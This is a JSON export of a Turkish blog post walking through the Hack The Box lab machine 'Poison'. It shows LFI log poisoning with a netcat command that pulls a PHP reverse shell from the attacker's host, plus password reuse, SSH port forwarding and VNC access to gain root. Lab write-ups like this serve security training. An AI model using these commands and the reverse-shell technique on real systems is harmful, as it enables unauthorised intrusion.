{"id":1494,"date":"2021-08-12T20:04:19","date_gmt":"2021-08-12T20:04:19","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1494"},"modified":"2021-08-12T20:13:15","modified_gmt":"2021-08-12T20:13:15","slug":"poison","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/08\/12\/poison\/","title":{"rendered":"Poison"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Makine Ad\u0131<\/th>\n<th>Seviye<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/132\" title=\"Poison\">Poison<\/a> - HTB<\/td>\n<td>Orta<\/td>\n<td>Linux<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/453800925395b3a5b14099e005fb5a77.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>nmap taramas\u0131 ile ba\u015flayal\u0131m. 80. portu a\u00e7\u0131k g\u00f6rd\u00fcm ve hemen ilerledim. Daha sonars\u0131nda  <a href=\"http:\/\/10.10.10.84\/pwdbackup.txt\">http:\/\/10.10.10.84\/pwdbackup.txt<\/a> adresini ke\u015ffettim. Ana sayfada bilin\u00e7i bir \u015fekilde lfi b\u0131rak\u0131lm\u0131\u015ft\u0131. Log poison yapca\u011f\u0131m\u0131z \u00e7ok belli.  <a href=\"http:\/\/10.10.10.84\/pwdbackup.txt\">http:\/\/10.10.10.84\/pwdbackup.txt<\/a> adresinde bir base64 vard\u0131 ve 13 kere \u015fifreledi\u011fini s\u00f6yl\u00fcyordu. \u0130ndirdim ve \u00e7\u00f6zd\u00fcm.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/poison]\n\u2514\u2500# cat key\nVm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU\nbGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS\nbVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW\nM040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs\nWmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy\neG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G\nWkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw\nMXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa\nT1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k\nWFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk\nWGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0\nNFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT\nVm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz\nWkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW\nVmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO\nUkd4RVdub3dPVU5uUFQwSwo=\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/poison]\n\u2514\u2500# cat key| base64 -d | base64 -d |  base64 -d |  base64 -d |  base64 -d |  base64 -d |  base64 -d |  base64 -d |  base64 -d |  base64 -d |  base64 -d |  base64 -d |  base64 -d   \nCharix!2#4%6&amp;8(0   \n<\/code><\/pre>\n<p>\/tmp'in i\u00e7ine bir reverse att\u0131m ve daha sonra bunu lfi ile \u00e7a\u011f\u0131r\u0131p shell ald\u0131m.<\/p>\n<pre><code class=\"language-sh\">view-source:http:\/\/10.10.10.84\/browse.php?file=\/var\/log\/httpd-access.log&amp;cmd=nc%2010.10.14.12%204444%20|%20tee%20\/tmp\/reverse.php<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/poison]\n\u2514\u2500# head php-reverse-shell.php \n&lt;?php\n\nset_time_limit (0);\n$VERSION = &quot;1.0&quot;;\n$ip = &#039;10.10.14.12&#039;;  \/\/ CHANGE THIS\n$port = 4444;       \/\/ CHANGE THIS\n$chunk_size = 1400;\n$write_a = null;\n$error_a = null;\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/poison]\n\u2514\u2500# cat php-reverse-shell.php| nc -lvp 4444\nlistening on [any] 4444 ...\n10.10.10.84: inverse host lookup failed: Unknown host\nconnect to [10.10.14.12] from (UNKNOWN) [10.10.10.84] 19800<\/code><\/pre>\n<pre><code class=\"language-sh\">http:\/\/10.10.10.84\/browse.php?file=%2Ftmp%2Freverse.php\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/poison]\n\u2514\u2500# nc -lvp 4444\nlistening on [any] 4444 ...\n10.10.10.84: inverse host lookup failed: Unknown host\nconnect to [10.10.14.12] from (UNKNOWN) [10.10.10.84] 14118\nFreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017     root@releng2.nyi.freebsd.org:\/usr\/obj\/usr\/src\/sys\/GENERIC  amd64\n 2:27PM  up  1:09, 0 users, load averages: 0.30, 0.34, 0.31\nUSER       TTY      FROM                                      LOGIN@  IDLE WHAT\nuid=80(www) gid=80(www) groups=80(www)\nsh: can&#039;t access tty; job control turned off\n$ <\/code><\/pre>\n<p>\/etc\/passwd'ye bakt\u0131\u011f\u0131mda <strong>charix<\/strong> kullan\u0131c\u0131s\u0131n\u0131 g\u00f6rd\u00fcm. Elimde de bir parola oldu\u011fundan dolay\u0131 deneyeyim dedim ve ak y\u00fckselttim.<\/p>\n<pre><code class=\"language-sh\">\n$ su charix\nPassword:Charix!2#4%6&amp;8(0\nid\nuid=1001(charix) gid=1001(charix) groups=1001(charix)<\/code><\/pre>\n<p>Tabiki ssh ile de bu i\u015flem yap\u0131labilirdi... Yapal\u0131m ve ilk flagimizi alal\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u2514\u2500# ssh charix@10.10.10.84                                                                                       1 \u2a2f\nPassword for charix@Poison:\nLast login: Mon Mar 19 16:38:00 2018 from 10.10.14.4\nFreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017\n\nWelcome to FreeBSD!\n\nRelease Notes, Errata: https:\/\/www.FreeBSD.org\/releases\/\nSecurity Advisories:   https:\/\/www.FreeBSD.org\/security\/\nFreeBSD Handbook:      https:\/\/www.FreeBSD.org\/handbook\/\nFreeBSD FAQ:           https:\/\/www.FreeBSD.org\/faq\/\nQuestions List: https:\/\/lists.FreeBSD.org\/mailman\/listinfo\/freebsd-questions\/\nFreeBSD Forums:        https:\/\/forums.FreeBSD.org\/\n\nDocuments installed with the system are in the \/usr\/local\/share\/doc\/freebsd\/\ndirectory, or can be installed later with:  pkg install en-freebsd-doc\nFor other languages, replace &quot;en&quot; with a language code like de or fr.\n\nShow the version of FreeBSD installed:  freebsd-version ; uname -a\nPlease include that output and any error messages when posting questions.\nIntroduction to manual pages:  man man\nFreeBSD directory layout:      man hier\n\nEdit \/etc\/motd to change this login announcement.\nTo erase a line you&#039;ve written at the command prompt, use &quot;Ctrl-U&quot;.\n        -- Dru &lt;genesis@istar.ca&gt;\ncharix@Poison:~ % ls\nsecret.zip  user.txt\ncharix@Poison:~ % cat user.txt \neaacdfb2d141b72a589233063604209c<\/code><\/pre>\n<p>Daha sonra linpeas \u00e7al\u0131\u015ft\u0131rd\u0131m ve ilgin\u00e7 bir \u015fey farkettim.<\/p>\n<pre><code>\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Cleaned processes\n\u255a Check weird &amp; unexpected proceses run by root: https:\/\/book.hacktricks.xyz\/linux-unix\/privilege-escalation#processes\nroot       1  2.0  0.1   5408  1040  -  SLs  13:17     0:00.03 \/sbin\/init --\ncharix 63435  0.2  0.3  13180  3348  1  S+   16:57     0:00.04 \/bin\/sh .\/linpeas.sh -a\nroot     319  0.0  0.5   9560  5052  -  Ss   13:17     0:00.64 \/sbin\/devd\nroot     390  0.0  0.2  10500  2448  -  Ss   13:17     0:00.97 \/usr\/sbin\/syslogd -s\nroot     543  0.0  0.5  56320  5416  -  S    13:18     0:07.90 \/usr\/local\/bin\/vmtoolsd -c \/usr\/local\/share\/vmware-tools\/tools.conf -p \/usr\/local\/lib\/open-vm-tools\/plugins\/vmsvc\nroot     620  0.0  0.7  57812  7052  -  Is   13:18     0:00.49 \/usr\/sbin\/sshd\nroot     785  0.0  1.1  99172 11516  -  Ss   13:19     0:00.32 \/usr\/local\/sbin\/httpd -DNOHTTPACCEPT\nwww      893  0.0  1.2 101220 12056  -  I    13:19     0:00.03 \/usr\/local\/sbin\/httpd -DNOHTTPACCEPT\nwww      894  0.0  1.2 101220 11996  -  I    13:19     0:00.10 \/usr\/local\/sbin\/httpd -DNOHTTPACCEPT\nwww      895  0.0  1.2 101220 11996  -  I    13:19     0:00.02 \/usr\/local\/sbin\/httpd -DNOHTTPACCEPT\nwww      896  0.0  1.2 101220 11996  -  I    13:19     0:00.06 \/usr\/local\/sbin\/httpd -DNOHTTPACCEPT\nwww      897  0.0  1.2 101220 11948  -  I    13:19     0:00.02 \/usr\/local\/sbin\/httpd -DNOHTTPACCEPT\nroot     930  0.0  0.6  20636  6204  -  Ss   13:20     0:00.18 sendmail: accepting connections (sendmail)\nsmmsp   1029  0.0  0.6  20636  5936  -  Is   13:20     0:00.00 sendmail: Queue runner@00:30:00 for \/var\/spool\/clientmqueue (sendmail)\nroot    1033  0.0  0.2  12592  2436  -  Ss   13:20     0:00.04 \/usr\/sbin\/cron -s\nwww     6109  0.0  0.3  13180  2680  -  I    14:58     0:00.01 \/bin\/sh -i\nroot    6154  0.0  0.3  43748  2968  -  I    15:10     0:00.01 su charix\ncharix  6167  0.0  0.3  19660  3096  -  I    15:11     0:00.01 _su (csh)\ncharix  6171  0.0  0.3  13180  2656  -  I    15:12     0:00.00 \/bin\/sh\nwww     8183  0.0  1.2 101220 11996  -  I    14:05     0:00.02 \/usr\/local\/sbin\/httpd -DNOHTTPACCEPT\nwww     8512  0.0  1.2 101220 11932  -  S    14:25     0:01.02 \/usr\/local\/sbin\/httpd -DNOHTTPACCEPT\ncharix  9736  0.0  0.8  85228  8160  -  S    15:14     0:00.47 sshd: charix@pts\/1 (sshd)\nroot     529  0.0  0.9  23620  8868 v0- I    13:18     0:00.03 Xvnc :1 -desktop X -httpd \/usr\/local\/share\/tightvnc\/classes -auth \/root\/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth \/root\/.vnc\/passwd -rfbport 5901 -localhost -nolisten tcp :1\nroot     540  0.0  0.7  67220  7064 v0- I    13:18     0:00.02 xterm -geometry 80x24+10+10 -ls -title X Desktop\nroot     541  0.0  0.5  37620  5312 v0- I    13:18     0:00.01 twm\nroot    1080  0.0  0.2  10484  2076 v0  Is+  13:20     0:00.00 \/usr\/libexec\/getty Pc ttyv0\nroot    1081  0.0  0.2  10484  2076 v1  Is+  13:20     0:00.00 \/usr\/libexec\/getty Pc ttyv1\nroot    1082  0.0  0.2  10484  2076 v2  Is+  13:20     0:00.00 \/usr\/libexec\/getty Pc ttyv2\nroot    1083  0.0  0.2  10484  2076 v3  Is+  13:20     0:00.00 \/usr\/libexec\/getty Pc ttyv3\nroot    1084  0.0  0.2  10484  2076 v4  Is+  13:20     0:00.00 \/usr\/libexec\/getty Pc ttyv4\nroot    1085  0.0  0.2  10484  2076 v5  Is+  13:20     0:00.00 \/usr\/libexec\/getty Pc ttyv5\nroot    1086  0.0  0.2  10484  2076 v6  Is+  13:20     0:00.00 \/usr\/libexec\/getty Pc ttyv6\nroot    1087  0.0  0.2  10484  2076 v7  Is+  13:20     0:00.00 \/usr\/libexec\/getty Pc ttyv7\nroot     563  0.0  0.4  19660  3616  0  Is+  13:18     0:00.01 -csh (csh)\ncharix  9745  0.0  0.4  19660  3736  1  Ss   15:14     0:00.06 -csh (csh)\ncharix 64456  0.0  0.3  13180  3348  1  S+   16:57     0:00.00 \/bin\/sh .\/linpeas.sh -a\ncharix 64459  0.0  0.3  13180  3348  1  S+   16:57     0:00.00 \/bin\/sh .\/linpeas.sh -a\ncharix 64460  0.0  0.3  21208  2668  1  R+   16:57     0:00.00 ps fauxwww<\/code><\/pre>\n<p>vnc oturum root haklar\u0131nda var. Ancak port localde. Bu y\u00fczden port y\u00f6nlendirmesi yapmam gerekiyor. ssh ile bunu ger\u00e7ekle\u015ftirdim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/poison]\n\u2514\u2500#  ssh -L5901:127.0.0.1:5901 charix@10.10.10.84<\/code><\/pre>\n<p>Daha sonra ba\u011flanmay\u0131 denedim.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/tool\/linux-smart-enumeration]\n\u2514\u2500# vncviewer 127.0.0.1::5901                                                                                   1 \u2a2f\nConnected to RFB server, using protocol version 3.8\nEnabling TightVNC protocol extensions\nPerforming standard VNC authentication\nPassword: \nAuthentication failed<\/code><\/pre>\n<p>Benden \u015ffre isteyince tekrar makineye ba\u011fland\u0131m ve home klas\u00f6r\u00fcndeki secret dosyas\u0131n\u0131 kullanmay\u0131 d\u00fc\u015f\u00fcnd\u00fcm. zip dosyas\u0131 \u015fifreliydi. Tespit etti\u011fim parolay\u0131 denedi\u011fimde a\u00e7\u0131ld\u0131.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/tool\/linux-smart-enumeration]\n\u2514\u2500# scp charix@10.10.10.84:\/home\/charix\/secret.zip .                                                             1 \u2a2f\nPassword for charix@Poison:\nPassword for charix@Poison:\nsecret.zip                                                                         100%  166     2.2KB\/s   00:00    \n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/tool\/linux-smart-enumeration]\n\u2514\u2500# 7z x secret.zip               \n\n7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21\np7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Core(TM) i7-8650U CPU @ 1.90GHz (806EA),ASM,AES-NI)\n\nScanning the drive for archives:\n1 file, 166 bytes (1 KiB)\n\nExtracting archive: secret.zip\n--\nPath = secret.zip\nType = zip\nPhysical Size = 166\n\nWould you like to replace the existing file:\n  Path:     .\/secret\n  Size:     0 bytes\n  Modified: 2021-08-12 12:12:59\nwith the file from archive:\n  Path:     secret\n  Size:     8 bytes (1 KiB)\n  Modified: 2018-01-24 13:01:14\n? (Y)es \/ (N)o \/ (A)lways \/ (S)kip all \/ A(u)to rename all \/ (Q)uit? y\n\nEnter password (will not be echoed):\nEverything is Ok\n\nSize:       8\nCompressed: 166\n<\/code><\/pre>\n<p>Ve root!<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/tool\/linux-smart-enumeration]\n\u2514\u2500# vncviewer 127.0.0.1::5901 -passwd secret                                                                    1 \u2a2f\nConnected to RFB server, using protocol version 3.8\nEnabling TightVNC protocol extensions\nPerforming standard VNC authentication\nAuthentication successful\nDesktop name &quot;root&#039;s X desktop (Poison:1)&quot;\nVNC server default format:\n  32 bits per pixel.\n  Least significant byte first in each pixel.\n  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0\nUsing default colormap which is TrueColor.  Pixel format:\n  32 bits per pixel.\n  Least significant byte first in each pixel.\n  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0\nSame machine: preferring raw encoding\n<\/code><\/pre>\n<p>A\u00e7\u0131lan vnc ekrarn\u0131nda root'tum.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Makine Ad\u0131 Seviye OS Logo Poison &#8211; HTB Orta Linux Walkthrough nmap taramas\u0131 ile ba\u015flayal\u0131m. 80. portu a\u00e7\u0131k g\u00f6rd\u00fcm ve hemen ilerledim. Daha sonars\u0131nda http:\/\/10.10.10.84\/pwdbackup.txt&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/08\/12\/poison\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">Poison<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[545],"class_list":["post-1494","post","type-post","status-publish","format-standard","hentry","category-walkthrough","tag-vnc","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1494","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1494"}],"version-history":[{"count":2,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1494\/revisions"}],"predecessor-version":[{"id":1501,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1494\/revisions\/1501"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1494"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1494"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1494"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}